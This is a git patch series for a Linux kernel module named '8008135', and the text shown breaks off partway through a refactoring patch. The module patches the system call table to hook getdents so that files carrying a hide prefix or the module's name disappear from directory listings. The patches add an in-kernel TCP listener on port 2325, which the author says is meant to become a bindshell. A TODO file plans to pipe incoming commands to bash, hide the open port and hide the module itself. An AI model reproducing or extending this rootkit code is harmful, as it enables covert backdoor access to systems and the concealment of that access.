From 28c40257587b2634c9e2b93c9344a6d67b87f323 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Fri, 22 Nov 2019 00:32:36 +0100 Subject: [PATCH 1/5] Adding a Socket Server to the Linux Kernel Module Gone a long way from trying to implement a socket bindshell using the standard C-Libraries (which obv. doesn't work in LKM!), then implementing an ASM-Solution only to find out there are problems with the x86/x32 bit and knowing that I have no clue of how to write ASM, I thought of looking into sockets on linux kernel modules - AAAND found one. So the files: * src/50ck3t.c * src/headers/50ck3t.h are basically from https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git Thanks for sharing! There will prob. be some additions and modifications. Makefile: * Some Stuff had to be renamed in the Makefile due to Renaming src/create_sysgen.sh -> src/cr3473_5y563n.sh & Added src/headers/50ck3t.h, src/50ck3t.c Including src/headers/50ck3t.h in 8008135.c Changing Module License to GPL, somehow GPLv3 was a problem to the compiler because of do_exit --- Makefile | 5 +- src/50ck3t.c | 558 +++++++++++++++++++++ src/8008135.c | 7 +- src/{create_sysgen.sh => cr3473_5y563n.sh} | 2 +- src/headers/50ck3t.h | 50 ++ src/headers/8008135.h | 4 +- 6 files changed, 619 insertions(+), 7 deletions(-) create mode 100644 src/50ck3t.c rename src/{create_sysgen.sh => cr3473_5y563n.sh} (89%) create mode 100644 src/headers/50ck3t.h diff --git a/Makefile b/Makefile index b18503c..255fc67 100644 --- a/Makefile +++ b/Makefile @@ -19,12 +19,13 @@ INCL_H := $(PWD)/$(INCL_S)/headers obj-m += $(MNAME).o # Core $(MNAME)-y += src/$(MNAME).o +$(MNAME)-y += src/50ck3t.o # Includes for header files etc ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) all: - $(shell $(SRCS_S)/create_sysgen.sh) + $(shell $(SRCS_S)/cr3473_5y563n.sh) $(MAKE) -C $(BUILDDIR) M=$(PWD) modules load: @@ -34,5 +35,5 @@ unload: rmmod $(MNAME) clean: - -rm $(SRCS_H)/sysgen.h + -rm $(SRCS_H)/5y563n.h $(MAKE) -C $(BUILDDIR) M=$(PWD) clean diff --git a/src/50ck3t.c b/src/50ck3t.c new file mode 100644 index 0000000..aace8b3 --- /dev/null +++ b/src/50ck3t.c @@ -0,0 +1,558 @@ +/* + * + * NOTE: + * this is basically this guys code: + * https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git + * his last update was 4 years ago, so there might be some changes, + * there definitely will be some regarding the data received/sent back since + * this is will be used as a bindshell + * but base is his work. + * + */ + +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +/**** includes ***************************************************************** +*******************************************************************************/ +#include "50ck3t.h" + +/**** types ******************************************************************* +*******************************************************************************/ +struct tcp_conn_handler_data{ + struct sockaddr_in *address; + struct socket *accept_socket; + int thread_id; +}; + +struct tcp_conn_handler{ + struct tcp_conn_handler_data *data[MAX_CONNS]; + struct task_struct *thread[MAX_CONNS]; + int tcp_conn_handler_stopped[MAX_CONNS]; +}; + +struct tcp_conn_handler *tcp_conn_handler; + + +struct tcp_server_service{ + int running; + struct socket *listen_socket; + struct task_struct *thread; + struct task_struct *accept_thread; +}; + +struct tcp_server_service *tcp_server; + + + +/**** var ********************************************************************** +*******************************************************************************/ +int tcp_listener_stopped = 0; +int tcp_acceptor_stopped = 0; + + +char *inet_ntoa(struct in_addr *in){ + char *str_ip = NULL; + u_int32_t int_ip = 0; + + str_ip = kmalloc(16 * sizeof(char), GFP_KERNEL); + + if(!str_ip) + return NULL; + else + memset(str_ip, 0, 16); + + int_ip = in->s_addr; + + sprintf(str_ip, "%d.%d.%d.%d", (int_ip) & 0xFF, (int_ip >> 8) & 0xFF, + (int_ip >> 16) & 0xFF, (int_ip >> 16) & 0xFF); + + return str_ip; +} + +int tcp_server_send(struct socket *sock, int id, const char *buf,\ + const size_t length, unsigned long flags){ + struct msghdr msg; + struct kvec vec; + int len, written = 0, left =length; + mm_segment_t oldmm; + + msg.msg_name = 0; + msg.msg_namelen = 0; + msg.msg_control = NULL; + msg.msg_controllen = 0; + msg.msg_flags = flags; + msg.msg_flags = 0; + + oldmm = get_fs(); set_fs(KERNEL_DS); + +repeat_send: + vec.iov_len = left; + vec.iov_base = (char *)buf + written; + + len = kernel_sendmsg(sock, &msg, &vec, left, left); + + if((len == -ERESTARTSYS) || (!(flags & MSG_DONTWAIT) &&\ + (len == -EAGAIN))) + goto repeat_send; + + if(len > 0){ + written += len; + left -= len; + if(left) + goto repeat_send; + } + + set_fs(oldmm); + return written?written:len; +} + +int tcp_server_receive(struct socket *sock, int id,struct sockaddr_in *address,\ + unsigned char *buf,int size, unsigned long flags){ + struct msghdr msg; + struct kvec vec; + int len; + char *tmp = NULL; + + if(sock==NULL){ + pr_info(" *** mtp | tcp server receive socket is NULL| " + " tcp_server_receive *** \n"); + return -1; + } + + msg.msg_name = 0; + msg.msg_namelen = 0; + msg.msg_control = NULL; + msg.msg_controllen = 0; + msg.msg_flags = flags; + + vec.iov_len = size; + vec.iov_base = buf; + +read_again: + if(!skb_queue_empty(&sock->sk->sk_receive_queue)) + pr_info("recv queue empty ? %s \n", + skb_queue_empty(&sock->sk->sk_receive_queue)?"yes":"no"); + + len = kernel_recvmsg(sock, &msg, &vec, size, size, flags); + + if(len == -EAGAIN || len == -ERESTARTSYS) + goto read_again; + + tmp = inet_ntoa(&(address->sin_addr)); + + pr_info("client-> %s:%d, says: %s\n", tmp, ntohs(address->sin_port), buf); + + kfree(tmp); + //len = msg.msg_iter.kvec->iov_len; + return len; +} + +int connection_handler(void *data){ + struct tcp_conn_handler_data *conn_data = + (struct tcp_conn_handler_data *)data; + + struct sockaddr_in *address = conn_data->address; + struct socket *accept_socket = conn_data->accept_socket; + int id = conn_data->thread_id; + + int ret; + int len = 49; + unsigned char in_buf[len+1]; + unsigned char out_buf[len+1]; + + + DECLARE_WAITQUEUE(recv_wait, current); + allow_signal(SIGKILL|SIGSTOP); + + while(1){ + add_wait_queue(&accept_socket->sk->sk_wq->wait, &recv_wait); + + while(skb_queue_empty(&accept_socket->sk->sk_receive_queue)){ + __set_current_state(TASK_INTERRUPTIBLE); + schedule_timeout(HZ); + + if(kthread_should_stop()){ + pr_info(" *** mtp | tcp server handle connection " + "thread stopped | connection_handler *** \n"); + + //tcp_conn_handler->thread[id] = NULL; + tcp_conn_handler->tcp_conn_handler_stopped[id]= 1; + + __set_current_state(TASK_RUNNING); + remove_wait_queue(&accept_socket->sk->sk_wq->wait,\ + &recv_wait); + kfree(tcp_conn_handler->data[id]->address); + kfree(tcp_conn_handler->data[id]); + sock_release(tcp_conn_handler->data[id]->accept_socket); + return 0; + } + + if(signal_pending(current)){ + __set_current_state(TASK_RUNNING); + remove_wait_queue(&accept_socket->sk->sk_wq->wait,\ + &recv_wait); + goto out; + } + } + __set_current_state(TASK_RUNNING); + remove_wait_queue(&accept_socket->sk->sk_wq->wait, &recv_wait); + + + pr_info("receiving message\n"); + memset(in_buf, 0, len+1); + ret = tcp_server_receive(accept_socket, id, address, in_buf, len,\ + MSG_DONTWAIT); + if(ret > 0){ + if(memcmp(in_buf, "HOLA", 4) == 0){ + memset(out_buf, 0, len+1); + strcat(out_buf, "HOLASI"); + pr_info("sending response: %s\n", out_buf); + tcp_server_send(accept_socket, id, out_buf,\ + strlen(out_buf), MSG_DONTWAIT); + } + /* + tmp = inet_ntoa(&(address->sin_addr)); + pr_info("connection handler: %d of: %s %d done sending " + " HOLASI\n", id, tmp, ntohs(address->sin_port)); + kfree(tmp); + */ + if(memcmp(in_buf, "ADIOS", 5) == 0){ + memset(out_buf, 0, len+1); + strcat(out_buf, "ADIOSAMIGO"); + pr_info("sending response: %s\n", out_buf); + tcp_server_send(accept_socket, id, out_buf,\ + strlen(out_buf), MSG_DONTWAIT); + break; + } + } + } + +out: + /* + tmp = inet_ntoa(&(address->sin_addr)); + + pr_info("connection handler: %d of: %s %d exiting normally\n", + id, tmp, ntohs(address->sin_port)); + kfree(tmp); + */ + tcp_conn_handler->tcp_conn_handler_stopped[id]= 1; + kfree(tcp_conn_handler->data[id]->address); + kfree(tcp_conn_handler->data[id]); + sock_release(tcp_conn_handler->data[id]->accept_socket); + //spin_lock(&tcp_server_lock); + tcp_conn_handler->thread[id] = NULL; + //spin_unlock(&tcp_server_lock); + //return 0; + do_exit(0); +} + +int tcp_server_accept(void){ + int accept_err = 0; + struct socket *socket; + struct socket *accept_socket = NULL; + struct inet_connection_sock *isock; + int id = 0; + DECLARE_WAITQUEUE(accept_wait, current); + allow_signal(SIGKILL|SIGSTOP); + socket = tcp_server->listen_socket; + pr_info(" *** mtp | creating the accept socket | tcp_server_accept " + "*** \n"); + + while(1){ + struct tcp_conn_handler_data *data = NULL; + struct sockaddr_in *client = NULL; + char *tmp; + int addr_len; + + accept_err = + sock_create(socket->sk->sk_family, socket->type,\ + socket->sk->sk_protocol, &accept_socket); + + if(accept_err < 0 || !accept_socket){ + pr_info(" *** mtp | accept_error: %d while creating " + "tcp server accept socket | " + "tcp_server_accept *** \n", accept_err); + goto err; + } + + accept_socket->type = socket->type; + accept_socket->ops = socket->ops; + + isock = inet_csk(socket->sk); + + + add_wait_queue(&socket->sk->sk_wq->wait, &accept_wait); + while(reqsk_queue_empty(&isock->icsk_accept_queue)){ + __set_current_state(TASK_INTERRUPTIBLE); + schedule_timeout(HZ); + if(kthread_should_stop()){ + pr_info(" *** mtp | tcp server acceptor thread " + "stopped | tcp_server_accept *** \n"); + tcp_acceptor_stopped = 1; + __set_current_state(TASK_RUNNING); + remove_wait_queue(&socket->sk->sk_wq->wait,\ + &accept_wait); + sock_release(accept_socket); + return 0; + } + + if(signal_pending(current)){ + __set_current_state(TASK_RUNNING); + remove_wait_queue(&socket->sk->sk_wq->wait,\ + &accept_wait); + goto release; + } + + } + __set_current_state(TASK_RUNNING); + remove_wait_queue(&socket->sk->sk_wq->wait, &accept_wait); + + pr_info("accept connection\n"); + + accept_err = + socket->ops->accept(socket, accept_socket, O_NONBLOCK); + + if(accept_err < 0){ + pr_info(" *** mtp | accept_error: %d while accepting " + "tcp server | tcp_server_accept *** \n", + accept_err); + goto release; + } + + client = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL); + memset(client, 0, sizeof(struct sockaddr_in)); + + addr_len = sizeof(struct sockaddr_in); + + accept_err = + accept_socket->ops->getname(accept_socket,\ + (struct sockaddr *)client,\ + &addr_len, 2); + + if(accept_err < 0){ + pr_info(" *** mtp | accept_error: %d in getname " + "tcp server | tcp_server_accept *** \n", + accept_err); + goto release; + } + + + tmp = inet_ntoa(&(client->sin_addr)); + + pr_info("connection from: %s %d \n", + tmp, ntohs(client->sin_port)); + + kfree(tmp); + + pr_info("handle connection\n"); + + + for(id = 0; id < MAX_CONNS; id++){ + if(tcp_conn_handler->thread[id] == NULL) + break; + } + + pr_info("gave free id: %d\n", id); + + if(id == MAX_CONNS) + goto release; + + data = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL); + memset(data, 0, sizeof(struct tcp_conn_handler_data)); + + data->address = client; + data->accept_socket = accept_socket; + data->thread_id = id; + + tcp_conn_handler->tcp_conn_handler_stopped[id] = 0; + tcp_conn_handler->data[id] = data; + tcp_conn_handler->thread[id] = + kthread_run((void *)connection_handler, (void *)data, MODULE_NAME); + + if(kthread_should_stop()){ + pr_info(" *** mtp | tcp server acceptor thread stopped" + " | tcp_server_accept *** \n"); + tcp_acceptor_stopped = 1; + return 0; + } + + if(signal_pending(current)){ + break; + } + + } + + + tcp_acceptor_stopped = 1; + do_exit(0); +release: + sock_release(accept_socket); +err: + tcp_acceptor_stopped = 1; + do_exit(0); +} + +int tcp_server_listen(void) +{ + int server_err; + struct socket *conn_socket; + struct sockaddr_in server; + + DECLARE_WAIT_QUEUE_HEAD(wq); + + allow_signal(SIGKILL|SIGTERM); + + server_err = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\ + &tcp_server->listen_socket); + if(server_err < 0){ + pr_info(" *** mtp | Error: %d while creating tcp server " + "listen socket | tcp_server_listen *** \n", server_err); + goto err; + } + + conn_socket = tcp_server->listen_socket; + tcp_server->listen_socket->sk->sk_reuse = 1; + + server.sin_addr.s_addr = INADDR_ANY; + server.sin_family = AF_INET; + server.sin_port = htons(DEFAULT_PORT); + + server_err = + conn_socket->ops->bind(conn_socket, (struct sockaddr*)&server,\ + sizeof(server)); + + if(server_err < 0){ + pr_info(" *** mtp | Error: %d while binding tcp server " + "listen socket | tcp_server_listen *** \n", server_err); + goto release; + } + + server_err = conn_socket->ops->listen(conn_socket, 16); + + if(server_err < 0){ + pr_info(" *** mtp | Error: %d while listening in tcp " + "server listen socket | tcp_server_listen " + "*** \n", server_err); + goto release; + } + + tcp_server->accept_thread = + kthread_run((void*)tcp_server_accept, NULL, MODULE_NAME); + + while(1){ + wait_event_timeout(wq, 0, 3*HZ); + + if(kthread_should_stop()){ + pr_info(" *** mtp | tcp server listening thread" + " stopped | tcp_server_listen *** \n"); + return 0; + } + + if(signal_pending(current)) + goto release; + } + + + sock_release(conn_socket); + tcp_listener_stopped = 1; + do_exit(0); +release: + sock_release(conn_socket); +err: + tcp_listener_stopped = 1; + do_exit(0); +} + +int tcp_server_start(void){ + tcp_server->running = 1; + tcp_server->thread = kthread_run((void *)tcp_server_listen, NULL,\ + MODULE_NAME); + return 0; +} + +int network_server_init(void){ + pr_info(" *** mtp | network_server initiated | " + "network_server_init ***\n"); + tcp_server = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL); + memset(tcp_server, 0, sizeof(struct tcp_server_service)); + + tcp_conn_handler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL); + memset(tcp_conn_handler, 0, sizeof(struct tcp_conn_handler)); + + tcp_server_start(); + return 0; +} + +void network_server_exit(void){ + int ret; + int id; + + if(tcp_server->thread == NULL) + pr_info(" *** mtp | No kernel thread to kill | " + "network_server_exit *** \n"); + else + { + for(id = 0; id < MAX_CONNS; id++) + { + if(tcp_conn_handler->thread[id] != NULL) + { + + if(!tcp_conn_handler->tcp_conn_handler_stopped[id]) + { + ret = + kthread_stop(tcp_conn_handler->thread[id]); + + if(!ret) + pr_info(" *** mtp | tcp server " + "connection handler thread: %d " + "stopped | network_server_exit " + "*** \n", id); + } + } + } + + if(!tcp_acceptor_stopped) + { + ret = kthread_stop(tcp_server->accept_thread); + if(!ret) + pr_info(" *** mtp | tcp server acceptor thread" + " stopped | network_server_exit *** \n"); + } + + if(!tcp_listener_stopped) + { + ret = kthread_stop(tcp_server->thread); + if(!ret) + pr_info(" *** mtp | tcp server listening thread" + " stopped | network_server_exit *** \n"); + } + + + if(tcp_server->listen_socket != NULL && !tcp_listener_stopped) + { + sock_release(tcp_server->listen_socket); + tcp_server->listen_socket = NULL; + } + + kfree(tcp_conn_handler); + kfree(tcp_server); + tcp_server = NULL; + } + +} diff --git a/src/8008135.c b/src/8008135.c index cf253f5..e8f42be 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -20,6 +20,7 @@ /**** includes ***************************************************************** *******************************************************************************/ #include "8008135.h" +#include "50ck3t.h" /**** var ******************************************************************** *******************************************************************************/ @@ -33,7 +34,7 @@ sys_getdents_t sys_getdents_orig = NULL; *******************************************************************************/ asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, - unsigned int count) { + unsigned int count){ int boff; struct linux_dirent* ent; @@ -54,7 +55,7 @@ asmlinkage long sys_getdents_new(unsigned int fd, // if it has hide prefix or module name anywhere, hide it if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { + || (strstr(ent->d_name, MODULE_NAME) != NULL)) { #if defined DEBUG printk("\n hide prefix or mod name contained!\n"); printk("\n ret %ld\n ", ret); @@ -107,6 +108,7 @@ static int __init init_8008135(void) { write_cr0(read_cr0() | WRITE_PROTECT_FLAG); printk(KERN_INFO "New syscall in place\n"); + network_server_init(); return 0; } @@ -118,6 +120,7 @@ static int __init init_8008135(void) { * RETURNS: - *******************************************************************************/ static void __exit exit_8008135(void) { + network_server_exit(); // allow us to write to read onlu pages write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); // set getdents handler back diff --git a/src/create_sysgen.sh b/src/cr3473_5y563n.sh similarity index 89% rename from src/create_sysgen.sh rename to src/cr3473_5y563n.sh index 50c4126..17d133d 100755 --- a/src/create_sysgen.sh +++ b/src/cr3473_5y563n.sh @@ -1,7 +1,7 @@ #!/usr/bin/env bash SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" SRCS_H="$SCRIPTPATH""/headers" -SGENH="$SRCS_H""/sysgen.h" +SGENH="$SRCS_H""/5y563n.h" smap="/boot/System.map-$(uname -r)" diff --git a/src/headers/50ck3t.h b/src/headers/50ck3t.h new file mode 100644 index 0000000..b9c7b35 --- /dev/null +++ b/src/headers/50ck3t.h @@ -0,0 +1,50 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +#ifndef SRC_HEADERS_50CK3T_H_ +#define SRC_HEADERS_50CK3T_H_ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include +#include +#include + +#include +#include + +#include +#include +#include + +#include +#include + +#include +#include +#include +#include + +#define DEFAULT_PORT 2325 +#define MAX_CONNS 16 +#define MODULE_NAME "8008135" + +int network_server_init(void); +void network_server_exit(void); + +#endif /* SRC_HEADERS_50CK3T_H_ */ diff --git a/src/headers/8008135.h b/src/headers/8008135.h index 82df99e..c81cdf3 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -26,7 +26,7 @@ #include #include #include -#include "sysgen.h" +#include "5y563n.h" /**** Defines ***************************************************************** @@ -44,7 +44,7 @@ /**** Modinfo **************************************************************** *******************************************************************************/ -MODULE_LICENSE("GPLv3"); +MODULE_LICENSE("GPL"); MODULE_AUTHOR("JanKoernerEnterprises"); MODULE_DESCRIPTION("8008135"); MODULE_VERSION("0.1"); From 6306de623413e0400d16697811a92f7bd767aa7b Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Fri, 22 Nov 2019 00:44:19 +0100 Subject: [PATCH 2/5] Adding TODO file --- TODO | 10 ++++++++++ 1 file changed, 10 insertions(+) create mode 100644 TODO diff --git a/TODO b/TODO new file mode 100644 index 0000000..77327fd --- /dev/null +++ b/TODO @@ -0,0 +1,10 @@ +# Pick One +## TCP Socket +* Add binding to shell: + * Incoming commands have to be redir to bash + * STDOUT, STDIN, STDERR Handling + * Remove chat, debug stuff +* Hide open Port + +## Module +* Hide itself From 24a629d7e88bff9547690355fee5aaf67200115e Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Fri, 22 Nov 2019 00:46:13 +0100 Subject: [PATCH 3/5] Renaming TODO to TODO.md for online markdown support --- TODO => TODO.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename TODO => TODO.md (100%) diff --git a/TODO b/TODO.md similarity index 100% rename from TODO rename to TODO.md From 3abccec17edf00ba3d4ce8b863157394a78e796b Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Fri, 22 Nov 2019 16:40:18 +0100 Subject: [PATCH 4/5] Refactoring --- src/50ck3t.c | 432 +++++++++++++++++++++++++-------------------------- 1 file changed, 209 insertions(+), 223 deletions(-) diff --git a/src/50ck3t.c b/src/50ck3t.c index aace8b3..9302803 100644 --- a/src/50ck3t.c +++ b/src/50ck3t.c @@ -35,9 +35,9 @@ /**** types ******************************************************************* *******************************************************************************/ struct tcp_conn_handler_data{ - struct sockaddr_in *address; - struct socket *accept_socket; - int thread_id; + struct sockaddr_in *FAddress; + struct socket *FAcceptSocket; + int FThreadID; }; struct tcp_conn_handler{ @@ -46,144 +46,146 @@ struct tcp_conn_handler{ int tcp_conn_handler_stopped[MAX_CONNS]; }; -struct tcp_conn_handler *tcp_conn_handler; +struct tcp_conn_handler *STCPConnHandler; struct tcp_server_service{ - int running; - struct socket *listen_socket; - struct task_struct *thread; - struct task_struct *accept_thread; + int FRunning; + struct socket *FListenSocket; + struct task_struct *FThread; + struct task_struct *FAccpeptThread; }; -struct tcp_server_service *tcp_server; +struct tcp_server_service *FTCPServer_Service; /**** var ********************************************************************** *******************************************************************************/ -int tcp_listener_stopped = 0; -int tcp_acceptor_stopped = 0; +static int STCPListenerStopped = 0; +static int STCPAcceptorStopped = 0; -char *inet_ntoa(struct in_addr *in){ - char *str_ip = NULL; - u_int32_t int_ip = 0; +char *inet_ntoa(struct in_addr *AInAddr){ + char *LIPAddr = NULL; + u_int32_t LIPInt = 0; - str_ip = kmalloc(16 * sizeof(char), GFP_KERNEL); + LIPAddr = kmalloc(16 * sizeof(char), GFP_KERNEL); - if(!str_ip) + if(!LIPAddr) return NULL; else - memset(str_ip, 0, 16); + memset(LIPAddr, 0, 16); - int_ip = in->s_addr; + LIPInt = AInAddr->s_addr; - sprintf(str_ip, "%d.%d.%d.%d", (int_ip) & 0xFF, (int_ip >> 8) & 0xFF, - (int_ip >> 16) & 0xFF, (int_ip >> 16) & 0xFF); + sprintf(LIPAddr, "%d.%d.%d.%d", (LIPInt) & 0xFF, (LIPInt >> 8) & 0xFF, + (LIPInt >> 16) & 0xFF, (LIPInt >> 16) & 0xFF); - return str_ip; + return LIPAddr; } -int tcp_server_send(struct socket *sock, int id, const char *buf,\ - const size_t length, unsigned long flags){ - struct msghdr msg; - struct kvec vec; - int len, written = 0, left =length; - mm_segment_t oldmm; +int tcp_server_send(struct socket *ASocket, int AID, const char *ABuf,\ + const size_t ALength, unsigned long AFlags){ + struct msghdr LMsgHeader; + struct kvec LVec; + int LLen, LWritten, LLeft; + mm_segment_t LOldMM; - msg.msg_name = 0; - msg.msg_namelen = 0; - msg.msg_control = NULL; - msg.msg_controllen = 0; - msg.msg_flags = flags; - msg.msg_flags = 0; + LWritten = 0; + LLeft = ALength; - oldmm = get_fs(); set_fs(KERNEL_DS); + LMsgHeader.msg_name = 0; + LMsgHeader.msg_namelen = 0; + LMsgHeader.msg_control = NULL; + LMsgHeader.msg_controllen = 0; + LMsgHeader.msg_flags = AFlags; + LMsgHeader.msg_flags = 0; + + LOldMM = get_fs(); set_fs(KERNEL_DS); repeat_send: - vec.iov_len = left; - vec.iov_base = (char *)buf + written; + LVec.iov_len = LLeft; + LVec.iov_base = (char *)ABuf + LWritten; - len = kernel_sendmsg(sock, &msg, &vec, left, left); + LLen = kernel_sendmsg(ASocket, &LMsgHeader, &LVec, LLeft, LLeft); - if((len == -ERESTARTSYS) || (!(flags & MSG_DONTWAIT) &&\ - (len == -EAGAIN))) + if((LLen == -ERESTARTSYS) || (!(AFlags & MSG_DONTWAIT) &&\ + (LLen == -EAGAIN))) goto repeat_send; - if(len > 0){ - written += len; - left -= len; - if(left) + if(LLen > 0){ + LWritten += LLen; + LLeft -= LLen; + if(LLeft) goto repeat_send; } - set_fs(oldmm); - return written?written:len; + set_fs(LOldMM); + return LWritten?LWritten:LLen; } -int tcp_server_receive(struct socket *sock, int id,struct sockaddr_in *address,\ - unsigned char *buf,int size, unsigned long flags){ - struct msghdr msg; - struct kvec vec; - int len; - char *tmp = NULL; +int tcp_server_receive(struct socket *ASock, int AID,struct sockaddr_in *AAddress,\ + unsigned char *ABuf,int ASize, unsigned long AFlags){ + struct msghdr LMsgHeader; + struct kvec LVec; + int LLen; + char *LTmp = NULL; - if(sock==NULL){ + if(ASock==NULL){ pr_info(" *** mtp | tcp server receive socket is NULL| " " tcp_server_receive *** \n"); return -1; } - msg.msg_name = 0; - msg.msg_namelen = 0; - msg.msg_control = NULL; - msg.msg_controllen = 0; - msg.msg_flags = flags; + LMsgHeader.msg_name = 0; + LMsgHeader.msg_namelen = 0; + LMsgHeader.msg_control = NULL; + LMsgHeader.msg_controllen = 0; + LMsgHeader.msg_flags = AFlags; - vec.iov_len = size; - vec.iov_base = buf; + LVec.iov_len = ASize; + LVec.iov_base = ABuf; read_again: - if(!skb_queue_empty(&sock->sk->sk_receive_queue)) + if(!skb_queue_empty(&ASock->sk->sk_receive_queue)) pr_info("recv queue empty ? %s \n", - skb_queue_empty(&sock->sk->sk_receive_queue)?"yes":"no"); + skb_queue_empty(&ASock->sk->sk_receive_queue)?"yes":"no"); - len = kernel_recvmsg(sock, &msg, &vec, size, size, flags); + LLen = kernel_recvmsg(ASock, &LMsgHeader, &LVec, ASize, ASize, AFlags); - if(len == -EAGAIN || len == -ERESTARTSYS) + if(LLen == -EAGAIN || LLen == -ERESTARTSYS) goto read_again; - tmp = inet_ntoa(&(address->sin_addr)); + LTmp = inet_ntoa(&(AAddress->sin_addr)); - pr_info("client-> %s:%d, says: %s\n", tmp, ntohs(address->sin_port), buf); + pr_info("client-> %s:%d, says: %s\n", LTmp, ntohs(AAddress->sin_port), ABuf); - kfree(tmp); - //len = msg.msg_iter.kvec->iov_len; - return len; + kfree(LTmp); + return LLen; } -int connection_handler(void *data){ - struct tcp_conn_handler_data *conn_data = - (struct tcp_conn_handler_data *)data; +int connection_handler(void *AData){ + struct tcp_conn_handler_data *LConnData = + (struct tcp_conn_handler_data *)AData; - struct sockaddr_in *address = conn_data->address; - struct socket *accept_socket = conn_data->accept_socket; - int id = conn_data->thread_id; + struct sockaddr_in *LAddress = LConnData->FAddress; + struct socket *LAcceptSocket = LConnData->FAcceptSocket; + int LID = LConnData->FThreadID; - int ret; - int len = 49; - unsigned char in_buf[len+1]; - unsigned char out_buf[len+1]; + int LRet; + int LLen = 49; + unsigned char LInBuf[LLen+1]; + unsigned char LOutBuf[LLen+1]; DECLARE_WAITQUEUE(recv_wait, current); allow_signal(SIGKILL|SIGSTOP); while(1){ - add_wait_queue(&accept_socket->sk->sk_wq->wait, &recv_wait); + add_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait); - while(skb_queue_empty(&accept_socket->sk->sk_receive_queue)){ + while(skb_queue_empty(&LAcceptSocket->sk->sk_receive_queue)){ __set_current_state(TASK_INTERRUPTIBLE); schedule_timeout(HZ); @@ -192,203 +194,187 @@ int connection_handler(void *data){ "thread stopped | connection_handler *** \n"); //tcp_conn_handler->thread[id] = NULL; - tcp_conn_handler->tcp_conn_handler_stopped[id]= 1; + STCPConnHandler->tcp_conn_handler_stopped[LID]= 1; __set_current_state(TASK_RUNNING); - remove_wait_queue(&accept_socket->sk->sk_wq->wait,\ + remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\ &recv_wait); - kfree(tcp_conn_handler->data[id]->address); - kfree(tcp_conn_handler->data[id]); - sock_release(tcp_conn_handler->data[id]->accept_socket); + kfree(STCPConnHandler->data[LID]->FAddress); + kfree(STCPConnHandler->data[LID]); + sock_release(STCPConnHandler->data[LID]->FAcceptSocket); return 0; } if(signal_pending(current)){ __set_current_state(TASK_RUNNING); - remove_wait_queue(&accept_socket->sk->sk_wq->wait,\ + remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\ &recv_wait); goto out; } } __set_current_state(TASK_RUNNING); - remove_wait_queue(&accept_socket->sk->sk_wq->wait, &recv_wait); + remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait); pr_info("receiving message\n"); - memset(in_buf, 0, len+1); - ret = tcp_server_receive(accept_socket, id, address, in_buf, len,\ + memset(LInBuf, 0, LLen+1); + LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\ MSG_DONTWAIT); - if(ret > 0){ - if(memcmp(in_buf, "HOLA", 4) == 0){ - memset(out_buf, 0, len+1); - strcat(out_buf, "HOLASI"); - pr_info("sending response: %s\n", out_buf); - tcp_server_send(accept_socket, id, out_buf,\ - strlen(out_buf), MSG_DONTWAIT); + if(LRet > 0){ + if(memcmp(LInBuf, "HOLA", 4) == 0){ + memset(LOutBuf, 0, LLen+1); + strcat(LOutBuf, "HOLASI"); + pr_info("sending response: %s\n", LOutBuf); + tcp_server_send(LAcceptSocket, LID, LOutBuf,\ + strlen(LOutBuf), MSG_DONTWAIT); } - /* - tmp = inet_ntoa(&(address->sin_addr)); - pr_info("connection handler: %d of: %s %d done sending " - " HOLASI\n", id, tmp, ntohs(address->sin_port)); - kfree(tmp); - */ - if(memcmp(in_buf, "ADIOS", 5) == 0){ - memset(out_buf, 0, len+1); - strcat(out_buf, "ADIOSAMIGO"); - pr_info("sending response: %s\n", out_buf); - tcp_server_send(accept_socket, id, out_buf,\ - strlen(out_buf), MSG_DONTWAIT); + if(memcmp(LInBuf, "ADIOS", 5) == 0){ + memset(LOutBuf, 0, LLen+1); + strcat(LOutBuf, "ADIOSAMIGO"); + pr_info("sending response: %s\n", LOutBuf); + tcp_server_send(LAcceptSocket, LID, LOutBuf,\ + strlen(LOutBuf), MSG_DONTWAIT); break; } } } out: - /* - tmp = inet_ntoa(&(address->sin_addr)); - - 